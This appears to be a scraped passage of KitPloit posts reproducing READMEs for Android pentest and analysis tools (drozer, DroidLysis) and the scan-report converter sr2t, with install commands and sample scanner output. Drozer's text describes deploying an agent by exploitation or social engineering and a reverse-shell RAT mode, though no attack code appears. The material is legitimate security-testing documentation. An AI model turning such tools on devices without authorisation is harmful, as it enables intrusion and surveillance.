      VolWeb exposes a REST API to allow analysts to interact with the platform. There is a dedicated repository proposing some scripts maintained by the community: https://github.com/forensicxlab/VolWeb-Scripts Check the wiki of the project to learn more about the possible API calls.

      Issues

      If you have encountered a bug, or wish to propose a feature, please feel free to open an issue. To enable us to quickly address them, follow the guide in the "Contributing" section of the Wiki associated with the project.

      Contact

      Contact me at k1nd0ne@mail.com for any questions regarding this tool.

      Next Release Goals

      Check out the roadmap: https://github.com/k1nd0ne/VolWeb/projects/1



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Drozer - The Leading Security Assessment Framework For Android

      By: Zion3R β€” April 1st 2024 at 11:30


      drozer (formerly Mercury) is the leading security testing framework for Android.

      drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.

      drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (WithSecure's advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).

      drozer is a good tool for simulating a rogue application. A penetration tester does not have to develop an app with custom code to interface with a specific content provider. Instead, drozer can be used with little to no programming experience required to show the impact of letting certain components be exported on a device.

      drozer is open source software, maintained by WithSecure, and can be downloaded from: https://labs.withsecure.com/tools/drozer/


      Docker Container

      To help with making sure drozer can be run on modern systems, a Docker container was created that has a working build of Drozer. This is currently the recommended method of using Drozer on modern systems.

      • The Docker container and basic setup instructions can be found here.
      • Instructions on building your own Docker container can be found here.

      Manual Building and Installation

      Prerequisites

      1. Python2.7

      Note: On Windows please ensure that the path to the Python installation and the Scripts folder under the Python installation are added to the PATH environment variable.

      1. Protobuf 2.6 or greater

      2. Pyopenssl 16.2 or greater

      3. Twisted 10.2 or greater

      4. Java Development Kit 1.7

      Note: On Windows please ensure that the path to javac.exe is added to the PATH environment variable.

      1. Android Debug Bridge

      Building Python wheel

      git clone https://github.com/WithSecureLabs/drozer.git
      cd drozer
      python setup.py bdist_wheel

      Installing Python wheel

      sudo pip install dist/drozer-2.x.x-py2-none-any.whl

      Building for Debian/Ubuntu/Mint

      git clone https://github.com/WithSecureLabs/drozer.git
      cd drozer
      make deb

      Installing .deb (Debian/Ubuntu/Mint)

      sudo dpkg -i drozer-2.x.x.deb

      Building for Redhat/Fedora/CentOS

      git clone https://github.com/WithSecureLabs/drozer.git
      cd drozer
      make rpm

      Installing .rpm (Redhat/Fedora/CentOS)

      sudo rpm -I drozer-2.x.x-1.noarch.rpm

      Building for Windows

      NOTE: Windows Defender and other Antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn't be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software. Alternatively, we recommend running drozer in a Windows/Linux VM.

      git clone https://github.com/WithSecureLabs/drozer.git
      cd drozer
      python.exe setup.py bdist_msi

      Installing .msi (Windows)

      Run dist/drozer-2.x.x.win-x.msi 

      Usage

      Installing the Agent

      Drozer can be installed using Android Debug Bridge (adb).

      Download the latest Drozer Agent here.

      $ adb install drozer-agent-2.x.x.apk

      Starting a Session

      You should now have the drozer Console installed on your PC, and the Agent running on your test device. Now, you need to connect the two and you're ready to start exploring.

      We will use the server embedded in the drozer Agent to do this.

      If using the Android emulator, you need to set up a suitable port forward so that your PC can connect to a TCP socket opened by the Agent inside the emulator, or on the device. By default, drozer uses port 31415:

      $ adb forward tcp:31415 tcp:31415

      Now, launch the Agent, select the "Embedded Server" option and tap "Enable" to start the server. You should see a notification that the server has started.

      Then, on your PC, connect using the drozer Console:

      On Linux:

      $ drozer console connect

      On Windows:

      > drozer.bat console connect

      If using a real device, the IP address of the device on the network must be specified:

      On Linux:

      $ drozer console connect --server 192.168.0.10

      On Windows:

      > drozer.bat console connect --server 192.168.0.10

      You should be presented with a drozer command prompt:

      selecting f75640f67144d9a3 (unknown sdk 4.1.1)  
      dz>

      The prompt confirms the Android ID of the device you have connected to, along with the manufacturer, model and Android software version.

      You are now ready to start exploring the device.

      Command Reference

      Command Description
      run Executes a drozer module
      list Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run.
      shell Start an interactive Linux shell on the device, in the context of the Agent process.
      cd Mounts a particular namespace as the root of session, to avoid having to repeatedly type the full name of a module.
      clean Remove temporary files stored by drozer on the Android device.
      contributors Displays a list of people who have contributed to the drozer framework and modules in use on your system.
      echo Print text to the console.
      exit Terminate the drozer session.
      help Display help about a particular command or module.
      load Load a file containing drozer commands, and execute them in sequence.
      module Find and install additional drozer modules from the Internet.
      permissions Display a list of the permissions granted to the drozer Agent.
      set Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer.
      unset Remove a named variable that drozer passes to any Linux shells that it spawns.

      License

      drozer is released under a 3-clause BSD License. See LICENSE for full details.

      Contacting the Project

      drozer is Open Source software, made great by contributions from the community.

      Bug reports, feature requests, comments and questions can be submitted here.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      DroidLysis - Property Extractor For Android Apps

      By: Zion3R β€” March 31st 2024 at 11:30


      DroidLysis is a pre-analysis tool for Android apps: it performs repetitive and boring tasks we'd typically do at the beginning of any reverse engineering. It disassembles the Android sample, organizes output in directories, and searches for suspicious spots in the code to look at. The output helps the reverse engineer speed up the first few steps of analysis.

      DroidLysis can be used over Android packages (apk), Dalvik executables (dex), Zip files (zip), Rar files (rar) or directories of files.


      Installing DroidLysis

      1. Install required system packages
      sudo apt-get install default-jre git python3 python3-pip unzip wget libmagic-dev libxml2-dev libxslt-dev
      1. Install Android disassembly tools

      2. Apktool ,

      3. Baksmali, and optionally
      4. Dex2jar and
      5. Obsolete: Procyon (note that Procyon only works with Java 8, not Java 11).
      $ mkdir -p ~/softs
      $ cd ~/softs
      $ wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.9.3.jar
      $ wget https://bitbucket.org/JesusFreke/smali/downloads/baksmali-2.5.2.jar
      $ wget https://github.com/pxb1988/dex2jar/releases/download/v2.4/dex-tools-v2.4.zip
      $ unzip dex-tools-v2.4.zip
      $ rm -f dex-tools-v2.4.zip
      1. Get DroidLysis from the Git repository (preferred) or from pip

      Install from Git in a Python virtual environment (python3 -m venv, or pyenv virtual environments etc).

      $ python3 -m venv venv
      $ source ./venv/bin/activate
      (venv) $ pip3 install git+https://github.com/cryptax/droidlysis

      Alternatively, you can install DroidLysis directly from PyPi (pip3 install droidlysis).

      1. Configure conf/general.conf. In particular make sure to change /home/axelle with your appropriate directories.
      [tools]
      apktool = /home/axelle/softs/apktool_2.9.3.jar
      baksmali = /home/axelle/softs/baksmali-2.5.2.jar
      dex2jar = /home/axelle/softs/dex-tools-v2.4/d2j-dex2jar.sh
      procyon = /home/axelle/softs/procyon-decompiler-0.5.30.jar
      keytool = /usr/bin/keytool
      ...
      1. Run it:
      python3 ./droidlysis3.py --help

      Configuration

      The configuration file is ./conf/general.conf (you can switch to another file with the --config option). This is where you configure the location of various external tools (e.g. Apktool), the name of pattern files (by default ./conf/smali.conf, ./conf/wide.conf, ./conf/arm.conf, ./conf/kit.conf) and the name of the database file (only used if you specify --enable-sql)

      Be sure to specify the correct paths for disassembly tools, or DroidLysis won't find them.

      Usage

      DroidLysis uses Python 3. To launch it and get options:

      droidlysis --help

      For example, test it on Signal's APK:

      droidlysis --input Signal-website-universal-release-6.26.3.apk --output /tmp --config /PATH/TO/DROIDLYSIS/conf/general.conf

      DroidLysis outputs:

      • A summary on the console (see image above)
      • The unzipped, pre-processed sample in a subdirectory of your output dir. The subdirectory is named using the sample's filename and sha256 sum. For example, if we analyze the Signal application and set --output /tmp, the analysis will be written to /tmp/Signalwebsiteuniversalrelease4.52.4.apk-f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290.
      • A database (by default, SQLite droidlysis.db) containing properties it noticed.

      Options

      Get usage with droidlysis --help

      • The input can be a file or a directory of files to recursively look into. DroidLysis knows how to process Android packages, DEX, ODEX and ARM executables, ZIP, RAR. DroidLysis won't fail on other type of files (unless there is a bug...) but won't be able to understand the content.

      • When processing directories of files, it is typically quite helpful to move processed samples to another location to know what has been processed. This is handled by option --movein. Also, if you are only interested in statistics, you should probably clear the output directory which contains detailed information for each sample: this is option --clearoutput. If you want to store all statistics in a SQL database, use --enable-sql (see here)

      • DEX decompilation is quite long with Procyon, so this option is disabled by default. If you want to decompile to Java, use --enable-procyon.

      • DroidLysis's analysis does not inspect known 3rd party SDK by default, i.e. for instance it won't report any suspicious activity from these. If you want them to be inspected, use option --no-kit-exception. This usually creates many more detected properties for the sample, as SDKs (e.g. advertisment) use lots of flagged APIs (get GPS location, get IMEI, get IMSI, HTTP POST...).

      Sample output directory (--output DIR)

      This directory contains (when applicable):

      • A readable AndroidManifest.xml
      • Readable resources in res
      • Libraries lib, assets assets
      • Disassembled Smali code: smali (and others)
      • Package meta information: META-INF
      • Package contents when simply unzipped in ./unzipped
      • DEX executable classes.dex (and others), and converted to jar: classes-dex2jar.jar, and unjarred in ./unjarred

      The following files are generated by DroidLysis:

      • autoanalysis.md: lists each pattern DroidLysis detected and where.
      • report.md: same as what was printed on the console

      If you do not need the sample output directory to be generated, use the option --clearoutput.

      Import trackers from Exodus etc (--import-exodus)

      $ python3 ./droidlysis3.py --import-exodus --verbose
      Processing file: ./droidurl.pyc ...
      DEBUG:droidconfig.py:Reading configuration file: './conf/./smali.conf'
      DEBUG:droidconfig.py:Reading configuration file: './conf/./wide.conf'
      DEBUG:droidconfig.py:Reading configuration file: './conf/./arm.conf'
      DEBUG:droidconfig.py:Reading configuration file: '/home/axelle/.cache/droidlysis/./kit.conf'
      DEBUG:droidproperties.py:Importing ETIP Exodus trackers from https://etip.exodus-privacy.eu.org/api/trackers/?format=json
      DEBUG:connectionpool.py:Starting new HTTPS connection (1): etip.exodus-privacy.eu.org:443
      DEBUG:connectionpool.py:https://etip.exodus-privacy.eu.org:443 "GET /api/trackers/?format=json HTTP/1.1" 200 None
      DEBUG:droidproperties.py:Appending imported trackers to /home/axelle/.cache/droidlysis/./kit.conf

      Trackers from Exodus which are not present in your initial kit.conf are appended to ~/.cache/droidlysis/kit.conf. Diff the 2 files and check what trackers you wish to add.

      SQLite database{#sqlite_database}

      If you want to process a directory of samples, you'll probably like to store the properties DroidLysis found in a database, to easily parse and query the findings. In that case, use the option --enable-sql. This will automatically dump all results in a database named droidlysis.db, in a table named samples. Each entry in the table is relative to a given sample. Each column is properties DroidLysis tracks.

      For example, to retrieve all filename, SHA256 sum and smali properties of the database:

      sqlite> select sha256, sanitized_basename, smali_properties from samples;
      f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290|Signalwebsiteuniversalrelease4.52.4.apk|{"send_sms": true, "receive_sms": true, "abort_broadcast": true, "call": false, "email": false, "answer_call": false, "end_call": true, "phone_number": false, "intent_chooser": true, "get_accounts": true, "contacts": false, "get_imei": true, "get_external_storage_stage": false, "get_imsi": false, "get_network_operator": false, "get_active_network_info": false, "get_line_number": true, "get_sim_country_iso": true,
      ...

      Property patterns

      What DroidLysis detects can be configured and extended in the files of the ./conf directory.

      A pattern consist of:

      • a tag name: example send_sms. This is to name the property. Must be unique across the .conf file.
      • a pattern: this is a regexp to be matched. Ex: ;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage. In the smali.conf file, this regexp is match on Smali code. In this particular case, there are 3 different ways to send SMS messages from the code: sendTextMessage, sendMultipartTextMessage and sendDataMessage.
      • a description (optional): explains the importance of the property and what it means.
      [send_sms]
      pattern=;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage
      description=Sending SMS messages

      Importing Exodus Privacy Trackers

      Exodus Privacy maintains a list of various SDKs which are interesting to rule out in our analysis via conf/kit.conf. Add option --import_exodus to the droidlysis command line: this will parse existing trackers Exodus Privacy knows and which aren't yet in your kit.conf. Finally, it will append all new trackers to ~/.cache/droidlysis/kit.conf.

      Afterwards, you may want to sort your kit.conf file:

      import configparser
      import collections
      import os

      config = configparser.ConfigParser({}, collections.OrderedDict)
      config.read(os.path.expanduser('~/.cache/droidlysis/kit.conf'))
      # Order all sections alphabetically
      config._sections = collections.OrderedDict(sorted(config._sections.items(), key=lambda t: t[0] ))
      with open('sorted.conf','w') as f:
      config.write(f)

      Updates

      • v3.4.6 - Detecting manifest feature that automatically loads APK at install
      • v3.4.5 - Creating a writable user kit.conf file
      • v3.4.4 - Bug fix #14
      • v3.4.3 - Using configuration files
      • v3.4.2 - Adding import of Exodus Privacy Trackers
      • v3.4.1 - Removed dependency to Androguard
      • v3.4.0 - Multidex support
      • v3.3.1 - Improving detection of Base64 strings
      • v3.3.0 - Dumping data to JSON
      • v3.2.1 - IP address detection
      • v3.2.0 - Dex2jar is optional
      • v3.1.0 - Detection of Base64 strings


      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Sr2T - Converts Scanning Reports To A Tabular Format

      By: Zion3R β€” March 23rd 2024 at 11:30


      Scanning reports to tabular (sr2t)

      This tool takes a scanning tool's output file, and converts it to a tabular format (CSV, XLSX, or text table). This tool can process output from the following tools:

      1. Nmap (XML);
      2. Nessus (XML);
      3. Nikto (XML);
      4. Dirble (XML);
      5. Testssl (JSON);
      6. Fortify (FPR).

      Rationale

      This tool can offer a human-readable, tabular format which you can tie to any observations you have drafted in your report. Why? Because then your reviewers can tell that you, the pentester, investigated all found open ports, and looked at all scanning reports.

      Dependencies

      1. argparse (dev-python/argparse);
      2. prettytable (dev-python/prettytable);
      3. python (dev-lang/python);
      4. xlsxwriter (dev-python/xlsxwriter).

      Install

      Using Pip:

      pip install --user sr2t

      Usage

      You can use sr2t in two ways:

      • When installed as package, call the installed script: sr2t --help.
      • When Git cloned, call the package directly from the root of the Git repository: python -m src.sr2t --help
      $ sr2t --help
      usage: sr2t [-h] [--nessus NESSUS [NESSUS ...]] [--nmap NMAP [NMAP ...]]
      [--nikto NIKTO [NIKTO ...]] [--dirble DIRBLE [DIRBLE ...]]
      [--testssl TESTSSL [TESTSSL ...]]
      [--fortify FORTIFY [FORTIFY ...]] [--nmap-state NMAP_STATE]
      [--nmap-services] [--no-nessus-autoclassify]
      [--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE]
      [--nessus-tls-file NESSUS_TLS_FILE]
      [--nessus-x509-file NESSUS_X509_FILE]
      [--nessus-http-file NESSUS_HTTP_FILE]
      [--nessus-smb-file NESSUS_SMB_FILE]
      [--nessus-rdp-file NESSUS_RDP_FILE]
      [--nessus-ssh-file NESSUS_SSH_FILE]
      [--nessus-min-severity NESSUS_MIN_SEVERITY]
      [--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH]
      [--nessus-sort-by NESSUS_SORT_BY]
      [--nikto-description-width NIKTO_DESCRIPTION_WIDTH]< br/> [--fortify-details] [--annotation-width ANNOTATION_WIDTH]
      [-oC OUTPUT_CSV] [-oT OUTPUT_TXT] [-oX OUTPUT_XLSX]
      [-oA OUTPUT_ALL]

      Converting scanning reports to a tabular format

      optional arguments:
      -h, --help show this help message and exit
      --nmap-state NMAP_STATE
      Specify the desired state to filter (e.g.
      open|filtered).
      --nmap-services Specify to ouput a supplemental list of detected
      services.
      --no-nessus-autoclassify
      Specify to not autoclassify Nessus results.
      --nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE
      Specify to override a custom Nessus autoclassify YAML
      file.
      --nessus-tls-file NESSUS_TLS_FILE
      Specify to override a custom Nessus TLS findings YAML
      file.
      --nessus-x509-file NESSUS_X509_FILE
      Specify to override a custom Nessus X.509 findings
      YAML file.
      --nessus-http-file NESSUS_HTTP_FILE
      Specify to override a custom Nessus HTTP findings YAML
      file.
      --nessus-smb-file NESSUS_SMB_FILE
      Specify to override a custom Nessus SMB findings YAML
      file.
      --nessus-rdp-file NESSUS_RDP_FILE
      Specify to override a custom Nessus RDP findings YAML
      file.
      --nessus-ssh-file NESSUS_SSH_FILE
      Specify to override a custom Nessus SSH findings YAML
      file.
      --nessus-min-severity NESSUS_MIN_SEVERITY
      Specify the minimum severity to output (e.g. 1).
      --nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH
      Specify the width of the pluginid column (e.g. 30).
      --nessus-sort-by NESSUS_SORT_BY
      Specify to sort output by ip-address, port, plugin-id,
      plugin-name or severity.
      --nikto-description-width NIKTO_DESCRIPTION_WIDTH
      Specify the width of the description column (e.g. 30).
      --fortify-details Specify to include the Fortify abstracts, explanations
      and recommendations for each vulnerability.
      --annotation-width ANNOTATION_WIDTH
      Specify the width of the annotation column (e.g. 30).
      -oC OUTPUT_CSV, --output-csv OUTPUT_CSV
      Specify the output CSV basename (e.g. output).
      -oT OUTPUT_TXT, --output-txt OUTPUT_TXT
      Specify the output TXT file (e.g. output.txt).
      -oX OUTPUT_XLSX, --output-xlsx OUTPUT_XLSX
      Specify the outpu t XLSX file (e.g. output.xlsx). Only
      for Nessus at the moment
      -oA OUTPUT_ALL, --output-all OUTPUT_ALL
      Specify the output basename to output to all formats
      (e.g. output).

      specify at least one:
      --nessus NESSUS [NESSUS ...]
      Specify (multiple) Nessus XML files.
      --nmap NMAP [NMAP ...]
      Specify (multiple) Nmap XML files.
      --nikto NIKTO [NIKTO ...]
      Specify (multiple) Nikto XML files.
      --dirble DIRBLE [DIRBLE ...]
      Specify (multiple) Dirble XML files.
      --testssl TESTSSL [TESTSSL ...]
      Specify (multiple) Testssl JSON files.
      --fortify FORTIFY [FORTIFY ...]
      Specify (multiple) HP Fortify FPR files.

      Example

      A few examples

      Nessus

      To produce an XLSX format:

      $ sr2t --nessus example/nessus.nessus --no-nessus-autoclassify -oX example.xlsx

      To produce an text tabular format to stdout:

      $ sr2t --nessus example/nessus.nessus
      +---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
      | host | port | plugin id | plugin name | severity | annotations |
      +---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
      | 192.168.142.4 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
      | 192.168.142.4 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
      | 192.168.142.4 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
      | 192.168.142.4 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
      | 192.168.142.4 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
      | 192.168.142.4 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
      | 192.168.142.4 | 3389 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
      | 192.168.142.4 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
      | 192.168.142.4 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
      | 192.168.142.4 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
      | 192.168.142.4 | 3389 | 51192 | SSL Certificate Can not Be Trusted | 2 | X |
      | 192.168.142.2 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
      | 192.168.142.2 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
      | 192.168.142.2 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
      | 192.168.142.2 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
      | 192.168.142.2 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
      | 192.168.142.2 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
      | 192.168.142.2 | 3389 | 45411 | S SL Certificate with Wrong Hostname | 2 | X |
      | 192.168.142.2 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
      | 192.168.142.2 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
      | 192.168.142.2 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
      | 192.168.142.2 | 3389 | 51192 | SSL Certificate Cannot Be Trusted | 2 | X |
      | 192.168.142.2 | 445 | 57608 | SMB Signing not required | 2 | X |
      +---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+

      Or to output a CSV file:

      $ sr2t --nessus example/nessus.nessus -oC example
      $ cat example_nessus.csv
      host,port,plugin id,plugin name,severity,annotations
      192.168.142.4,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
      192.168.142.4,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
      192.168.142.4,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
      192.168.142.4,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
      192.168.142.4,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
      192.168.142.4,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
      192.168.142.4,3389,45411,SSL Certificate with Wrong Hostname,2,X
      192.168.142.4,443,45411,SSL Certificate with Wrong Hostname,2,X
      192.168.142.4,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
      192.168.142.4,3389,57582,SSL Self-Signed Certificate,2,X
      192.168.142.4,3389,51192,SSL Certificate Cannot Be Trusted,2,X
      192.168.142.2,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
      192.168.142.2,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
      192.168.142.2,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
      192.168.142.2,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
      192.168.142.2,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
      192.168.142.2,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
      192.168.142.2,3389,45411,SSL Certificate with Wrong Hostname,2,X
      192.168.142.2,443,45411,SSL Certificate with Wrong Hostname,2,X
      192.168.142.2,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
      192.168.142.2,3389,57582,SSL Self-Signed Certificate,2,X
      192.168.142.2,3389,51192,SSL Certificate Cannot Be Trusted,2,X
      192.168.142.2,44 5,57608,SMB Signing not required,2,X

      Nmap

      To produce an XLSX format:

      $ sr2t --nmap example/nmap.xml -oX example.xlsx

      To produce an text tabular format to stdout:

      $ sr2t --nmap example/nmap.xml --nmap-services
      Nmap TCP:
      +-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
      | | 53 | 80 | 88 | 135 | 139 | 389 | 445 | 3389 | 5800 | 5900 |
      +-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
      | 192.168.23.78 | X | | X | X | X | X | X | X | | |
      | 192.168.27.243 | | | | X | X | | X | X | X | X |
      | 192.168.99.164 | | | | X | X | | X | X | X | X |
      | 192.168.228.211 | | X | | | | | | | | |
      | 192.168.171.74 | | | | X | X | | X | X | X | X |
      +-----------------+----+----+----+-----+-----+-----+-----+------+------+------+

      Nmap Services:
      +-----------------+------+-------+---------------+-------+
      | ip address | port | proto | service | state |
      +--------------- --+------+-------+---------------+-------+
      | 192.168.23.78 | 53 | tcp | domain | open |
      | 192.168.23.78 | 88 | tcp | kerberos-sec | open |
      | 192.168.23.78 | 135 | tcp | msrpc | open |
      | 192.168.23.78 | 139 | tcp | netbios-ssn | open |
      | 192.168.23.78 | 389 | tcp | ldap | open |
      | 192.168.23.78 | 445 | tcp | microsoft-ds | open |
      | 192.168.23.78 | 3389 | tcp | ms-wbt-server | open |
      | 192.168.27.243 | 135 | tcp | msrpc | open |
      | 192.168.27.243 | 139 | tcp | netbios-ssn | open |
      | 192.168.27.243 | 445 | tcp | microsoft-ds | open |
      | 192.168.27.243 | 3389 | tcp | ms-wbt-server | open |
      | 192.168.27.243 | 5800 | tcp | vnc-http | open |
      | 192.168.27.243 | 5900 | tcp | vnc | open |
      | 192.168.99.164 | 135 | tcp | msrpc | open |
      | 192.168.99.164 | 139 | tcp | netbios-ssn | open |
      | 192 .168.99.164 | 445 | tcp | microsoft-ds | open |
      | 192.168.99.164 | 3389 | tcp | ms-wbt-server | open |
      | 192.168.99.164 | 5800 | tcp | vnc-http | open |
      | 192.168.99.164 | 5900 | tcp | vnc | open |
      | 192.168.228.211 | 80 | tcp | http | open |
      | 192.168.171.74 | 135 | tcp | msrpc | open |
      | 192.168.171.74 | 139 | tcp | netbios-ssn | open |
      | 192.168.171.74 | 445 | tcp | microsoft-ds | open |
      | 192.168.171.74 | 3389 | tcp | ms-wbt-server | open |
      | 192.168.171.74 | 5800 | tcp | vnc-http | open |
      | 192.168.171.74 | 5900 | tcp | vnc | open |
      +-----------------+------+-------+---------------+-------+

      Or to output a CSV file:

      $ sr2t --nmap example/nmap.xml -oC example
      $ cat example_nmap_tcp.csv
      ip address,53,80,88,135,139,389,445,3389,5800,5900
      192.168.23.78,X,,X,X,X,X,X,X,,
      192.168.27.243,,,,X,X,,X,X,X,X
      192.168.99.164,,,,X,X,,X,X,X,X
      192.168.228.211,,X,,,,,,,,
      192.168.171.74,,,,X,X,,X,X,X,X

      Nikto

      To produce an XLSX format:

      $ sr2t --nikto example/nikto.xml -oX example/nikto.xlsx

      To produce an text tabular format to stdout:

      $ sr2t --nikto example/nikto.xml
      +----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
      | target ip | target hostname | target port | description | annotations |
      +----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
      | 192.168.178.10 | 192.168.178.10 | 80 | The anti-clickjacking X-Frame-Options header is not present. | X |
      | 192.168.178.10 | 192.168.178.10 | 80 | The X-XSS-Protection header is not defined. This header can hint to the user | X |
      | | | | agent to protect against some forms of XSS | |
      | 192.168.178.10 | 192.168.178.10 | 8 0 | The X-Content-Type-Options header is not set. This could allow the user agent to | X |
      | | | | render the content of the site in a different fashion to the MIME type | |
      +----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+

      Or to output a CSV file:

      $ sr2t --nikto example/nikto.xml -oC example
      $ cat example_nikto.csv
      target ip,target hostname,target port,description,annotations
      192.168.178.10,192.168.178.10,80,The anti-clickjacking X-Frame-Options header is not present.,X
      192.168.178.10,192.168.178.10,80,"The X-XSS-Protection header is not defined. This header can hint to the user
      agent to protect against some forms of XSS",X
      192.168.178.10,192.168.178.10,80,"The X-Content-Type-Options header is not set. This could allow the user agent to
      render the content of the site in a different fashion to the MIME type",X

      Dirble

      To produce an XLSX format:

      $ sr2t --dirble example/dirble.xml -oX example.xlsx

      To produce an text tabular format to stdout:

      $ sr2t --dirble example/dirble.xml
      +-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
      | url | code | content len | is directory | is listable | found from listable | redirect url | annotations |
      +-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
      | http://example.org/flv | 0 | 0 | false | false | false | | X |
      | http://example.org/hire | 0 | 0 | false | false | false | | X |
      | http://example.org/phpSQLiteAdmin | 0 | 0 | false | false | false | | X |
      | http://example.org/print_order | 0 | 0 | false | false | fa lse | | X |
      | http://example.org/putty | 0 | 0 | false | false | false | | X |
      | http://example.org/receipts | 0 | 0 | false | false | false | | X |
      +-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+

      Or to output a CSV file:

      $ sr2t --dirble example/dirble.xml -oC example
      $ cat example_dirble.csv
      url,code,content len,is directory,is listable,found from listable,redirect url,annotations
      http://example.org/flv,0,0,false,false,false,,X
      http://example.org/hire,0,0,false,false,false,,X
      http://example.org/phpSQLiteAdmin,0,0,false,false,false,,X
      http://example.org/print_order,0,0,false,false,false,,X
      http://example.org/putty,0,0,false,false,false,,X
      http://example.org/receipts,0,0,false,false,false,,X

      Testssl

      To produce an XLSX format:

      $ sr2t --testssl example/testssl.json -oX example.xlsx

      To produce an text tabular format to stdout:

      $ sr2t --testssl example/testssl.json
      +-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
      | ip address | port | BREACH | No HSTS | No PFS | No TLSv1.3 | RC4 | TLSv1.0 | TLSv1.1 | Wildcard |
      +-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
      | rc4-md5.badssl.com/104.154.89.105 | 443 | X | X | X | X | X | X | X | X |
      +-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+

      Or to output a CSV file:

      $ sr2t --testssl example/testssl.json -oC example
      $ cat example_testssl.csv
      ip address,port,BREACH,No HSTS,No PFS,No TLSv1.3,RC4,TLSv1.0,TLSv1.1,Wildcard
      rc4-md5.badssl.com/104.154.89.105,443,X,X,X,X,X,X,X,X

      Fortify

      To produce an XLSX format:

      $ sr2t --fortify example/fortify.fpr -oX example.xlsx

      To produce an text tabular format to stdout:

      $ sr2t --fortify example/fortify.fpr
      +--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
      | | type | subtype | severity | confidence | annotations |
      +--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
      | example1/web.xml:135:135 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
      | example2/web.xml:150:150 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
      | example3/web.xml:109:109 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
      | example4/web.xml:108:108 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
      | example5/web.xml:166:166 | J2EE Misconfiguration | Inse cure Transport | 3.0 | 5.0 | X |
      | example6/web.xml:2:2 | J2EE Misconfiguration | Excessive Session Timeout | 3.0 | 5.0 | X |
